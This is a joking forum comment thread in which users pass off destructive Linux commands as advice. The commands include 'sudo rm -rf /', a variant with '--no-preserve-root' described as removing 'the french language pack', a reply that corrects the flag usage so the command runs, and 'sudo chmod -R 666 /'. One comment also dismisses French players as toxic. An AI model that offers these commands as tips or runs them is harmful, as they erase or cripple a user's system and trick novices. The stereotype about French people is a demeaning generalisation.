You're viewing a single thread.
All Comments
318 comments
sudo rm -rf /
12 5 Replyalways remove the french language pack
sudo rm -fr /
34 0 ReplyMake sure to also completely delete the word roots.
sudo rm -fr /* --no-preserve-root
8 0 ReplyYou only need the
--no-preserve-root
flag when acting on/
.So the correct code would be either
sudo rm -fr /*
orsudo rm -fr / --no-preserve-root
(more appropriate for your 'advice')2 0 Reply
Every bit counts. Gotta remove unnecessary bloat.
5 0 ReplyGood. French kids are always extra toxic online. Someone toxic in Rocket League? Usually French.
4 0 Reply
sudo chmod -R 666 /
4 0 Reply
318 comments
Scroll to top